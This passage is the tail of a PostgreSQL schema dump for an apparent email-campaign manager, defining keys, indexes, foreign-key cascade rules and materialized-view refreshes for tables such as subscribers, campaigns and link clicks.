-- Name: links links_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.links
ADD CONSTRAINT links_pkey PRIMARY KEY (id);
--
-- Name: links links_url_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.links
ADD CONSTRAINT links_url_key UNIQUE (url);
--
-- Name: links links_uuid_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.links
ADD CONSTRAINT links_uuid_key UNIQUE (uuid);
--
-- Name: lists lists_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.lists
ADD CONSTRAINT lists_pkey PRIMARY KEY (id);
--
-- Name: lists lists_uuid_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.lists
ADD CONSTRAINT lists_uuid_key UNIQUE (uuid);
--
-- Name: media media_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.media
ADD CONSTRAINT media_pkey PRIMARY KEY (id);
--
-- Name: media media_uuid_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.media
ADD CONSTRAINT media_uuid_key UNIQUE (uuid);
--
-- Name: roles roles_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.roles
ADD CONSTRAINT roles_pkey PRIMARY KEY (id);
--
-- Name: sessions sessions_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.sessions
ADD CONSTRAINT sessions_pkey PRIMARY KEY (id);
--
-- Name: settings settings_key_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.settings
ADD CONSTRAINT settings_key_key UNIQUE (key);
--
-- Name: subscriber_lists subscriber_lists_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscriber_lists
ADD CONSTRAINT subscriber_lists_pkey PRIMARY KEY (subscriber_id, list_id);
--
-- Name: subscribers subscribers_email_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscribers
ADD CONSTRAINT subscribers_email_key UNIQUE (email);
--
-- Name: subscribers subscribers_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscribers
ADD CONSTRAINT subscribers_pkey PRIMARY KEY (id);
--
-- Name: subscribers subscribers_uuid_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscribers
ADD CONSTRAINT subscribers_uuid_key UNIQUE (uuid);
--
-- Name: templates templates_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.templates
ADD CONSTRAINT templates_pkey PRIMARY KEY (id);
--
-- Name: users users_email_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users
ADD CONSTRAINT users_email_key UNIQUE (email);
--
-- Name: users users_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users
ADD CONSTRAINT users_pkey PRIMARY KEY (id);
--
-- Name: users users_username_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users
ADD CONSTRAINT users_username_key UNIQUE (username);
--
-- Name: campaign_lists_campaign_id_list_id_idx; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX campaign_lists_campaign_id_list_id_idx ON public.campaign_lists USING btree (campaign_id, list_id);
--
-- Name: idx_bounces_camp_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_bounces_camp_id ON public.bounces USING btree (campaign_id);
--
-- Name: idx_bounces_date; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_bounces_date ON public.bounces USING btree (((timezone('UTC'::text, created_at))::date));
--
-- Name: idx_bounces_source; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_bounces_source ON public.bounces USING btree (source);
--
-- Name: idx_bounces_sub_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_bounces_sub_id ON public.bounces USING btree (subscriber_id);
--
-- Name: idx_camp_lists_camp_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camp_lists_camp_id ON public.campaign_lists USING btree (campaign_id);
--
-- Name: idx_camp_lists_list_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camp_lists_list_id ON public.campaign_lists USING btree (list_id);
--
-- Name: idx_camp_media_camp_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camp_media_camp_id ON public.campaign_media USING btree (campaign_id);
--
-- Name: idx_camp_media_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX idx_camp_media_id ON public.campaign_media USING btree (campaign_id, media_id);
--
-- Name: idx_camps_created_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camps_created_at ON public.campaigns USING btree (created_at);
--
-- Name: idx_camps_name; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camps_name ON public.campaigns USING btree (name);
--
-- Name: idx_camps_status; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camps_status ON public.campaigns USING btree (status);
--
-- Name: idx_camps_updated_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_camps_updated_at ON public.campaigns USING btree (updated_at);
--
-- Name: idx_clicks_camp_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_clicks_camp_id ON public.link_clicks USING btree (campaign_id);
--
-- Name: idx_clicks_date; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_clicks_date ON public.link_clicks USING btree (((timezone('UTC'::text, created_at))::date));
--
-- Name: idx_clicks_link_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_clicks_link_id ON public.link_clicks USING btree (link_id);
--
-- Name: idx_clicks_sub_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_clicks_sub_id ON public.link_clicks USING btree (subscriber_id);
--
-- Name: idx_lists_created_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_created_at ON public.lists USING btree (created_at);
--
-- Name: idx_lists_name; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_name ON public.lists USING btree (name);
--
-- Name: idx_lists_optin; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_optin ON public.lists USING btree (optin);
--
-- Name: idx_lists_status; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_status ON public.lists USING btree (status);
--
-- Name: idx_lists_type; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_type ON public.lists USING btree (type);
--
-- Name: idx_lists_updated_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_lists_updated_at ON public.lists USING btree (updated_at);
--
-- Name: idx_media_filename; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_media_filename ON public.media USING btree (provider, filename);
--
-- Name: idx_roles; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX idx_roles ON public.roles USING btree (parent_id, list_id);
--
-- Name: idx_roles_name; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX idx_roles_name ON public.roles USING btree (type, name) WHERE (name IS NOT NULL);
--
-- Name: idx_sessions; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_sessions ON public.sessions USING btree (id, created_at);
--
-- Name: idx_settings_key; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_settings_key ON public.settings USING btree (key);
--
-- Name: idx_sub_lists_list_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_sub_lists_list_id ON public.subscriber_lists USING btree (list_id);
--
-- Name: idx_sub_lists_status; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_sub_lists_status ON public.subscriber_lists USING btree (status);
--
-- Name: idx_sub_lists_sub_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_sub_lists_sub_id ON public.subscriber_lists USING btree (subscriber_id);
--
-- Name: idx_subs_created_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_subs_created_at ON public.subscribers USING btree (created_at);
--
-- Name: idx_subs_email; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX idx_subs_email ON public.subscribers USING btree (lower(email));
--
-- Name: idx_subs_id_status; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_subs_id_status ON public.subscribers USING btree (id, status);
--
-- Name: idx_subs_status; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_subs_status ON public.subscribers USING btree (status);
--
-- Name: idx_subs_updated_at; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_subs_updated_at ON public.subscribers USING btree (updated_at);
--
-- Name: idx_views_camp_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_views_camp_id ON public.campaign_views USING btree (campaign_id);
--
-- Name: idx_views_date; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_views_date ON public.campaign_views USING btree (((timezone('UTC'::text, created_at))::date));
--
-- Name: idx_views_subscriber_id; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE INDEX idx_views_subscriber_id ON public.campaign_views USING btree (subscriber_id);
--
-- Name: mat_dashboard_charts_idx; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX mat_dashboard_charts_idx ON public.mat_dashboard_charts USING btree (updated_at);
--
-- Name: mat_dashboard_stats_idx; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX mat_dashboard_stats_idx ON public.mat_dashboard_counts USING btree (updated_at);
--
-- Name: mat_list_subscriber_stats_idx; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX mat_list_subscriber_stats_idx ON public.mat_list_subscriber_stats USING btree (list_id, status);
--
-- Name: templates_is_default_idx; Type: INDEX; Schema: public; Owner: monkeyrelevy_0
--
CREATE UNIQUE INDEX templates_is_default_idx ON public.templates USING btree (is_default) WHERE (is_default = true);
--
-- Name: bounces bounces_campaign_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.bounces
ADD CONSTRAINT bounces_campaign_id_fkey FOREIGN KEY (campaign_id) REFERENCES public.campaigns(id) ON UPDATE CASCADE ON DELETE SET NULL;
--
-- Name: bounces bounces_subscriber_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.bounces
ADD CONSTRAINT bounces_subscriber_id_fkey FOREIGN KEY (subscriber_id) REFERENCES public.subscribers(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: campaign_lists campaign_lists_campaign_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_lists
ADD CONSTRAINT campaign_lists_campaign_id_fkey FOREIGN KEY (campaign_id) REFERENCES public.campaigns(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: campaign_lists campaign_lists_list_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_lists
ADD CONSTRAINT campaign_lists_list_id_fkey FOREIGN KEY (list_id) REFERENCES public.lists(id) ON UPDATE CASCADE ON DELETE SET NULL;
--
-- Name: campaign_media campaign_media_campaign_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_media
ADD CONSTRAINT campaign_media_campaign_id_fkey FOREIGN KEY (campaign_id) REFERENCES public.campaigns(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: campaign_media campaign_media_media_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_media
ADD CONSTRAINT campaign_media_media_id_fkey FOREIGN KEY (media_id) REFERENCES public.media(id) ON UPDATE CASCADE ON DELETE SET NULL;
--
-- Name: campaign_views campaign_views_campaign_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_views
ADD CONSTRAINT campaign_views_campaign_id_fkey FOREIGN KEY (campaign_id) REFERENCES public.campaigns(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: campaign_views campaign_views_subscriber_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_views
ADD CONSTRAINT campaign_views_subscriber_id_fkey FOREIGN KEY (subscriber_id) REFERENCES public.subscribers(id) ON UPDATE CASCADE ON DELETE SET NULL;
--
-- Name: campaigns campaigns_archive_template_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns
ADD CONSTRAINT campaigns_archive_template_id_fkey FOREIGN KEY (archive_template_id) REFERENCES public.templates(id) ON DELETE SET NULL;
--
-- Name: campaigns campaigns_template_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns
ADD CONSTRAINT campaigns_template_id_fkey FOREIGN KEY (template_id) REFERENCES public.templates(id) ON DELETE SET NULL;
--
-- Name: link_clicks link_clicks_campaign_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.link_clicks
ADD CONSTRAINT link_clicks_campaign_id_fkey FOREIGN KEY (campaign_id) REFERENCES public.campaigns(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: link_clicks link_clicks_link_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.link_clicks
ADD CONSTRAINT link_clicks_link_id_fkey FOREIGN KEY (link_id) REFERENCES public.links(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: link_clicks link_clicks_subscriber_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.link_clicks
ADD CONSTRAINT link_clicks_subscriber_id_fkey FOREIGN KEY (subscriber_id) REFERENCES public.subscribers(id) ON UPDATE CASCADE ON DELETE SET NULL;
--
-- Name: roles roles_list_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.roles
ADD CONSTRAINT roles_list_id_fkey FOREIGN KEY (list_id) REFERENCES public.lists(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: roles roles_parent_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.roles
ADD CONSTRAINT roles_parent_id_fkey FOREIGN KEY (parent_id) REFERENCES public.roles(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: subscriber_lists subscriber_lists_list_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscriber_lists
ADD CONSTRAINT subscriber_lists_list_id_fkey FOREIGN KEY (list_id) REFERENCES public.lists(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: subscriber_lists subscriber_lists_subscriber_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.subscriber_lists
ADD CONSTRAINT subscriber_lists_subscriber_id_fkey FOREIGN KEY (subscriber_id) REFERENCES public.subscribers(id) ON UPDATE CASCADE ON DELETE CASCADE;
--
-- Name: users users_list_role_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users
ADD CONSTRAINT users_list_role_id_fkey FOREIGN KEY (list_role_id) REFERENCES public.roles(id) ON DELETE CASCADE;
--
-- Name: users users_user_role_id_fkey; Type: FK CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.users
ADD CONSTRAINT users_user_role_id_fkey FOREIGN KEY (user_role_id) REFERENCES public.roles(id) ON DELETE RESTRICT;
--
-- Name: SCHEMA public; Type: ACL; Schema: -; Owner: monkeyrelevy_0
--
REVOKE USAGE ON SCHEMA public FROM PUBLIC;
--
-- Name: mat_dashboard_charts; Type: MATERIALIZED VIEW DATA; Schema: public; Owner: monkeyrelevy_0
--
REFRESH MATERIALIZED VIEW public.mat_dashboard_charts;
--
-- Name: mat_dashboard_counts; Type: MATERIALIZED VIEW DATA; Schema: public; Owner: monkeyrelevy_0
--
REFRESH MATERIALIZED VIEW public.mat_dashboard_counts;
--
-- Name: mat_list_subscriber_stats; Type: MATERIALIZED VIEW DATA; Schema: public; Owner: monkeyrelevy_0
--
REFRESH MATERIALIZED VIEW public.mat_list_subscriber_stats;
--
-- PostgreSQL database dump complete
--
\unrestrict 0PQdXbYcNO9Lc3jgblkodhD4ZG5YWpYju4kDRb20oRW0XPoefNK7N0KJ0kBURMf